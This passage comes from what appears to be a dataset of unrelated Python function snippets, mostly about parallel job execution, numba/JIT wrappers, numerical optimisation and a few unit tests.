option\" % type\n return par\n \n #call the optimser with the appropriate function\n fitted_par = Algorithm(OptFunc, var_par, (LogLikelihood,func_args,fixed,fixed_par), \\\n **add_kwords)\n \n #now return the params in the correct order...\n if fixed==None:\n return_par = fitted_par\n else:\n return_par = np.copy(par) \n return_par[np.where(fixed!=True)] = fitted_par\n \n return return_par", "def _run_job(args):\n # Note that we do not set the seed of the random number generator because\n # we already modified the interaction matrix before calling this function\n # and it does not harm us when all sub processes have the same sequence of\n # random numbers.\n \n # create the object ...\n obj = LibraryBinaryNumeric(**args[0])\n # ... get the method to evaluate ...\n method = getattr(obj, args[1])\n # ... 
and evaluate it\n if len(args) > 2:\n return method(**args[2])\n else:\n return method()", "def progress_wrapper(user_defined_function: Callable, master_workers_queue: multiprocessing.Queue, index: int, chunk_size: int) -> Callable:\n ...", "def generate_numba_table_func(\n func: Callable[..., np.ndarray],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_table(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ):\n result = np.empty((len(begin), values.shape[1]))\n min_periods_mask = np.empty(result.shape)\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window), axis=0)\n sub_result = numba_func(window, *args)\n nan_mask = len(window) - count_nan >= minimum_periods\n min_periods_mask[i, :] = nan_mask\n result[i, :] = sub_result\n result = np.where(min_periods_mask, result, np.nan)\n return result\n\n return roll_table", "def _dummy_jit(*args, **kwargs):\n\n def wrapper(f):\n return f\n\n def marker(*args, **kwargs):\n return marker\n\n if (\n len(args) > 0\n and (args[0] is marker or not callable(args[0]))\n or len(kwargs) > 0\n ):\n return wrapper\n elif len(args) == 0:\n return wrapper\n else:\n return args[0]", "def parfor(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=\"threading\", func_args=[], func_kwargs={}):\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n if engine == \"joblib\":\n p = joblib.Parallel(n_jobs=n_jobs, backend=backend)\n d = joblib.delayed(func)\n d_l = []\n for in_element in in_list:\n d_l.append(d(in_element, *func_args, **func_kwargs))\n results = p(d_l)\n\n elif engine == \"dask\":\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n p = partial(func, *func_args, **func_kwargs)\n d = [dask.delayed(p)(i) for i in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*d, get=dask.multiprocessing.get,\n workers=n_jobs)\n elif backend == \"threading\":\n results = dask.compute(*d, get=dask.threaded.get,\n workers=n_jobs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def default_helper_c_code_args():\r\n\r\n return {\r\n \"c_prefix\": \"PyArray\",\r\n \"strides_mul\": 1,\r\n }", "def test_workon_with_parallel_backend(self):\n\n def foo(x):\n return [dict(name=\"result\", type=\"objective\", value=x * 2)]\n\n import joblib\n\n with joblib.parallel_backend(\"loky\"):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=5, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 5\n\n with joblib.parallel_backend(\"loky\", n_jobs=-1):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=3, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 3", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket 
import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def with_numpy(func):\r\n return func", "def test_default(self):\n varargs = ()\n kwargs = {}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 1)", "def do_partask(fn, jobs, _args=None, blocking=True,\n combfn=None, init=None,\n pass_idx=False,\n singleproc=False,\n manager=None,\n pass_queue=None,\n N=None):\n if singleproc or N == 1:\n moreargs = ()\n if pass_idx:\n moreargs += (0,)\n if pass_queue != None:\n moreargs += (pass_queue,)\n return fn(jobs, _args, *moreargs)\n\n if manager == None:\n print \"...creating new Manager...\"\n manager = multiprocessing.Manager()\n else:\n print \"...Received Your Manager, roger...\"\n queue = manager.Queue()\n\n p = multiprocessing.Process(target=spawn_jobs, args=(queue, fn, jobs, _args, pass_idx, pass_queue, N))\n p.start()\n\n num_jobs = len(jobs)\n if combfn == None:\n combfn = combfn_lst\n init = []\n elif combfn == 'dict':\n combfn = combfn_dict\n init = {}\n elif combfn == 'ignore':\n combfn = combfn_ignore\n init = True\n \n results = init\n while True:\n subresults = queue.get()\n if isinstance(subresults, POOL_CLOSED):\n return results\n results = combfn(results, subresults)\n return results", "def run_multiprocessing(args, function):\n vcf_fn = args.data_file\n num_processes = args.num_threads\n if num_processes > 1:\n # Split the VCF into chunks\n callset = allel.read_vcf(vcf_fn, fields=[\"variants/CHROM\", \"variants/POS\"])\n pos_list = 
callset[\"variants/POS\"]\n chroms = callset[\"variants/CHROM\"]\n assert np.all(chroms == chroms[0])\n chrom = str(chroms[0])\n\n def get_chromosome_chunks(lst, num_processes):\n length = len(lst)\n n = math.ceil(length / num_processes)\n chunks = list()\n for index, i in enumerate(range(0, length, n)):\n if index != num_processes - 1:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[i + n])),\n )\n )\n else:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[-1])),\n )\n )\n return chunks\n\n chunks = get_chromosome_chunks(pos_list, num_processes)\n chunks_iter = iter(chunks)\n reports = list()\n completed_files = list()\n with multiprocessing.Pool(processes=num_processes, maxtasksperchild=10) as pool:\n for index, row in enumerate(pool.map(function, chunks_iter)):\n reports.append(row)\n print(\n \"Processed Chunk {}: {} with {} sites added.\".format(\n index, chunks[index][2], row[\"num_sites\"]\n )\n )\n if row[\"num_sites\"] > 0:\n completed_files.append(index)\n else:\n os.remove(args.output_file + str(index) + \"-lock\")\n\n # Combine reports and print\n master_report = reports[0]\n for report in reports[1:]:\n for var_type, val in report.items():\n master_report[var_type] += val\n print(master_report)\n\n # Combine sampledata files\n filenames = completed_files\n all_samples = []\n for name in filenames:\n all_samples.append(tsinfer.load(args.output_file + str(name)))\n os.remove(args.output_file + str(name))\n\n samples = all_samples[0].copy(args.output_file)\n samples.append_sites(*all_samples[1:])\n samples.finalise()\n assert np.all(np.diff(samples.sites_position[:]) > 0)\n\n else:\n raise ValueError", "def joblib_batch_evaluator(\n func,\n arguments,\n *,\n n_cores=N_CORES,\n error_handling=\"continue\",\n unpack_symbol=None,\n):\n _check_inputs(func, arguments, n_cores, error_handling, unpack_symbol)\n n_cores = int(n_cores) if int(n_cores) >= 2 else 1\n\n reraise = error_handling == \"raise\"\n\n @unpack(symbol=unpack_symbol)\n @catch(default=\"__traceback__\", reraise=reraise)\n def internal_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n if n_cores == 1:\n res = [internal_func(arg) for arg in arguments]\n else:\n res = Parallel(n_jobs=n_cores)(delayed(internal_func)(arg) for arg in arguments)\n\n return res", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def fmin(func, x0, args=(), kw=dict(), xtol=1e-4, ftol=1e-4, maxiter=None, maxfun=None,\n full_output=0, disp=1, retall=0, callback=None, zdelt = 0.00025, nonzdelt = 0.05, \n holdfixed=None):\n # 2011-04-13 14:26 IJMC: Adding Keyword option\n # 2011-05-11 10:48 IJMC: Added the zdelt and nonzdelt options\n # 2011-05-30 15:36 IJMC: Added the holdfixed option\n\n def wrap_function(function, args, **kw):\n ncalls = [0]\n def function_wrapper(x):\n ncalls[0] += 1\n return function(x, *args, **kw)\n return ncalls, function_wrapper\n\n # Set up holdfixed arrays\n if holdfixed is not None:\n holdfixed = np.array(holdfixed)\n #x0[holdfixed] = x0[holdfixed]\n holdsome = True\n else:\n holdsome = False\n #holdfixed = np.zeros(params.size, dtype=bool)\n \n #if holdsome:\n # print \"holdfixed>>\", holdfixed\n\n fcalls, func = wrap_function(func, args, **kw)\n x0 = np.asfarray(x0).flatten()\n xoriginal = x0.copy()\n N = len(x0)\n rank = len(x0.shape)\n if not -1 < rank < 2:\n raise ValueError, \"Initial guess must be a scalar or rank-1 sequence.\"\n if maxiter is None:\n 
maxiter = N * 200\n if maxfun is None:\n maxfun = N * 200\n\n rho = 1; chi = 2; psi = 0.5; sigma = 0.5;\n one2np1 = range(1,N+1)\n\n if rank == 0:\n sim = np.zeros((N+1,), dtype=x0.dtype)\n else:\n sim = np.zeros((N+1,N), dtype=x0.dtype)\n fsim = np.zeros((N+1,), float)\n sim[0] = x0\n if retall:\n allvecs = [sim[0]]\n #print func.__name__\n #print x0\n fsim[0] = func(x0)\n for k in range(0,N):\n y = np.array(x0,copy=True)\n if y[k] != 0:\n y[k] = (1+nonzdelt)*y[k]\n else:\n y[k] = zdelt\n if holdsome and k in holdfixed:\n y[k] = xoriginal[k]\n sim[k+1] = y\n f = func(y)\n fsim[k+1] = f\n\n ind = np.argsort(fsim)\n fsim = np.take(fsim,ind,0)\n # sort so sim[0,:] has the lowest function value\n sim = np.take(sim,ind,0)\n\n iterations = 1\n\n while (fcalls[0] < maxfun and iterations < maxiter):\n ### IJC Edit to understand fmin!\n ##print 'xtol>> ' + str(max(np.ravel(abs(sim[1:]-sim[0])))) + ' > ' + str(xtol)\n ##print 'ftol>> ' + str(max(abs(fsim[0]-fsim[1:]))) + ' > ' + str(ftol)\n if (max(np.ravel(abs(sim[1:]-sim[0]))) <= xtol \\\n and max(abs(fsim[0]-fsim[1:])) <= ftol):\n break\n\n xbar = np.add.reduce(sim[:-1],0) / N\n xr = (1+rho)*xbar - rho*sim[-1]\n if holdsome:\n xr[holdfixed] = xoriginal[holdfixed]\n fxr = func(xr)\n doshrink = 0\n\n if fxr < fsim[0]:\n xe = (1+rho*chi)*xbar - rho*chi*sim[-1]\n if holdsome:\n xe[holdfixed] = xoriginal[holdfixed]\n fxe = func(xe)\n\n if fxe < fxr:\n sim[-1] = xe\n fsim[-1] = fxe\n else:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fsim[0] <= fxr\n if fxr < fsim[-2]:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fxr >= fsim[-2]\n # Perform contraction\n if fxr < fsim[-1]:\n xc = (1+psi*rho)*xbar - psi*rho*sim[-1]\n if holdsome:\n xc[holdfixed] = xoriginal[holdfixed]\n fxc = func(xc)\n\n if fxc <= fxr:\n sim[-1] = xc\n fsim[-1] = fxc\n else:\n doshrink=1\n else:\n # Perform an inside contraction\n xcc = (1-psi)*xbar + psi*sim[-1]\n if holdsome:\n xcc[holdfixed] = xoriginal[holdfixed]\n fxcc = func(xcc)\n\n if fxcc < fsim[-1]:\n sim[-1] = xcc\n fsim[-1] = fxcc\n else:\n doshrink = 1\n\n if doshrink:\n for j in one2np1:\n sim[j] = sim[0] + sigma*(sim[j] - sim[0])\n if holdsome:\n sim[j, holdfixed] = xoriginal[holdfixed]\n fsim[j] = func(sim[j])\n\n ind = np.argsort(fsim)\n sim = np.take(sim,ind,0)\n fsim = np.take(fsim,ind,0)\n if callback is not None:\n callback(sim[0])\n iterations += 1\n if retall:\n allvecs.append(sim[0])\n\n x = sim[0]\n fval = min(fsim)\n warnflag = 0\n\n if fcalls[0] >= maxfun:\n warnflag = 1\n if disp:\n print \"Warning: Maximum number of function evaluations has \"\\\n \"been exceeded.\"\n elif iterations >= maxiter:\n warnflag = 2\n if disp:\n print \"Warning: Maximum number of iterations has been exceeded\"\n else:\n if disp:\n print \"Optimization terminated successfully.\"\n print \" Current function value: %f\" % fval\n print \" Iterations: %d\" % iterations\n print \" Function evaluations: %d\" % fcalls[0]\n\n\n if full_output:\n retlist = x, fval, iterations, fcalls[0], warnflag\n if retall:\n retlist += (allvecs,)\n else:\n retlist = x\n if retall:\n retlist = (x, allvecs)\n\n return retlist", "def applymap_nb(a, map_func_nb, *args):\n out = np.full_like(a, np.nan, dtype=np.float_)\n\n for col in range(out.shape[1]):\n idxs = np.flatnonzero(~np.isnan(a[:, col]))\n for i in idxs:\n out[i, col] = map_func_nb(i, col, a[i, col], *args)\n return out", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def autovectorized(f):\r\n 
def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def _init_matrix(matrices, transform_func, default_val):\n if matrices is None:\n return default_val\n return transform_func(matrices)", "def _apply_defaults(func, args, kwargs):\n\n sig = signature(func)\n bound_arguments = sig.bind(*args, **kwargs)\n for param in sig.parameters.values():\n if param.name not in bound_arguments.arguments:\n bound_arguments.arguments[param.name] = param.default\n args = [bound_arguments.arguments[key] for key in sig.parameters.keys()]\n return args, {}", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def numba_check():\n numba = importlib.util.find_spec(\"numba\")\n return numba is not None", "def jit(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n def wrap_mindspore(func):\n if hash_args:\n hash_obj = _get_jit_hash(hash_args)\n else:\n hash_obj = int(time.time() * 1e9)\n\n @wraps(func)\n def staging_specialize(*args, **kwargs):\n if os.getenv(\"MS_JIT\") == '0':\n return func(*args, **kwargs)\n\n args, kwargs = _handle_func_args(func, *args, **kwargs)\n\n process_obj = None\n if args and not isinstance(args[0], PythonTensor) and hasattr(args[0], func.__name__):\n process_obj = args[0]\n # only the function or cell instance wrapped by shard will fall into this branch\n if _is_pynative_parallel() and func.__name__ == _PYNATIVE_PARALLEL_FUNC_NAME:\n process_obj = hash_args\n out = _MindsporeFunctionExecutor(func, hash_obj, input_signature, process_obj, jit_config)(*args, **kwargs)\n return out\n\n return staging_specialize\n\n if fn is not None:\n return wrap_mindspore(fn)\n return wrap_mindspore", "def parfor(fn, niters, fixed_args = (), ee = shared_exec_engine):\n assert isinstance(fn, Function), \\\n \"Can only run LLVM functions, not %s\" % type(fn)\n \n # in case fixed arguments aren't yet GenericValues, convert them\n fixed_args = tuple(gv_from_python(v, arg.type) \n for (v,arg) in \n zip(fixed_args, fn.args))\n iter_ranges, steps, shape = parse_iters(niters)\n result_lltype = return_type(fn) \n if result_lltype == ty_void:\n work_fn = parfor_wrapper(fn, steps)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return \n else:\n assert is_llvm_float_type(result_lltype) or is_llvm_int_type(result_lltype)\n dtype = lltype_to_dtype(result_lltype)\n result_array = np.empty(shape = shape, dtype = dtype)\n fixed_args = (GenericValue.pointer(result_array.ctypes.data),) + fixed_args\n work_fn = parfor_wrapper(fn, steps, shape)\n n_given = len(fixed_args) + 2*len(steps)\n n_expected = len(work_fn.args)\n assert n_given == n_expected, \\\n \"Work function expects %d arguments but got %d\" % (n_expected, n_given)\n launch(work_fn, 
iter_ranges, fixed_args, ee)\n return result_array\n assert False, \"Collecting results not yet implemented\"", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def test_increment_input_with_threads():\r\n a = [0]\r\n Parallel(n_jobs=2, backend=\"threading\")(\r\n delayed(increment_input)(a) for _ in range(5))\r\n nose.tools.assert_equal(a, [5])", "def __init__(self, defaults={}, data=None):\n\n super().__init__(\n defaults={**OptimizationParameters.parameters, **defaults}, data=data\n )", "def EM_numba(F,G,Y0,T=100,N=500000):\n\n Y0 = np.array(Y0)\n Y = np.zeros((Y0.shape[0],N+1))\n Y[:,0]=Y0\n dt = T/N\n t=np.linspace(0,T,N+1)\n\n for jt in range(0,N):\n Y[:,jt+1]=_EM_step(F,G,Y[:,jt],dt)\n\n return t,Y", "def __call__(self, *args, **kwargs):\n # TODO: figure out how to check if we are using a jobserver-supporting ninja,\n # the two split ninja packages make this very difficult right now\n parallel = should_set_parallel_jobs(jobserver_support=True) and kwargs.pop(\n \"parallel\", self.jobs > 1\n )\n\n if parallel:\n args = (\"-j{0}\".format(self.jobs),) + args\n jobs_env = kwargs.pop(\"jobs_env\", None)\n if jobs_env:\n # Caller wants us to set an environment variable to\n # control the parallelism.\n kwargs[\"extra_env\"] = {jobs_env: str(self.jobs)}\n\n return super(MakeExecutable, self).__call__(*args, **kwargs)", "def compute(args, fun, max_workers=6):\n print(\"\\nProcessing symbols in parallel\")\n ex = futures.ThreadPoolExecutor(max_workers=max_workers)\n ex.map(fun, args)", "def parallelize(func: callable, iterable, func_args: tuple=None, func_kwargs: dict=None, njobs=None, no_progress=False, **pbar_kw):\n if func_args is None:\n func_args = ()\n if func_kwargs is None:\n func_kwargs = {}\n njobs = get_njobs(njobs)\n\n if 'total' not in pbar_kw:\n try:\n n = len(iterable)\n pbar_kw['total'] = n\n except TypeError:\n pass\n\n delayed = joblib.delayed\n\n if no_progress or not HAS_TQDM:\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n else:\n with tqdm_joblib(**pbar_kw):\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n return res", "def parallel_calculation(self, serial_fun, init_config, **kwargs):\r\n burned_in_config = self.burn_in(init_config, **kwargs)\r\n num_processes = 1\r\n if platform in ('linux', 'linux2'):\r\n num_processes = kwargs.get('num_processes', mp.cpu_count())\r\n if num_processes > 1:\r\n output = mp.Queue()\r\n\r\n def fun(seed, output):\r\n output.put(\r\n serial_fun(\r\n burned_in_config,\r\n urng=np.random.RandomState(seed).random, **kwargs\r\n )\r\n )\r\n\r\n processes = [\r\n mp.Process(target=fun, args=(seed, output))\r\n for seed in np.random.randint(88, size=num_processes)\r\n ]\r\n for p in processes:\r\n p.start()\r\n for p in processes:\r\n p.join()\r\n process_results = [output.get() for p in processes]\r\n return np.mean(process_results)\r\n return serial_fun(burned_in_config, **kwargs)", "def _chunk_vmapped_function(vmapped_fun, chunk_size, argnums=0):\n\n if chunk_size is None:\n return vmapped_fun\n\n if isinstance(argnums, int):\n argnums = (argnums,)\n\n def _fun(*args):\n\n n_elements = jax.tree_leaves(args[argnums[0]])[0].shape[0]\n n_chunks, n_rest = divmod(n_elements, chunk_size)\n\n if n_chunks == 0 or chunk_size >= n_elements:\n y = vmapped_fun(*args)\n else:\n # split inputs\n def _get_chunks(x):\n x_chunks = jax.tree_map(lambda x_: x_[: n_elements - n_rest, ...], x)\n x_chunks = 
_chunk(x_chunks, chunk_size)\n return x_chunks\n\n def _get_rest(x):\n x_rest = jax.tree_map(lambda x_: x_[n_elements - n_rest :, ...], x)\n return x_rest\n\n args_chunks = [\n _get_chunks(a) if i in argnums else a for i, a in enumerate(args)\n ]\n args_rest = [\n _get_rest(a) if i in argnums else a for i, a in enumerate(args)\n ]\n\n y_chunks = _unchunk(\n scanmap(vmapped_fun, scan_append, argnums)(*args_chunks)\n )\n\n if n_rest == 0:\n y = y_chunks\n else:\n y_rest = vmapped_fun(*args_rest)\n y = jax.tree_map(\n lambda y1, y2: jnp.concatenate((y1, y2)), y_chunks, y_rest\n )\n return y\n\n return _fun", "def fun_par_dict(fun: Callable, *args):\n if len(args) > 0:\n return fun(*args[:-1], **args[-1])\n else:\n return fun()", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n 
distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 
'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n 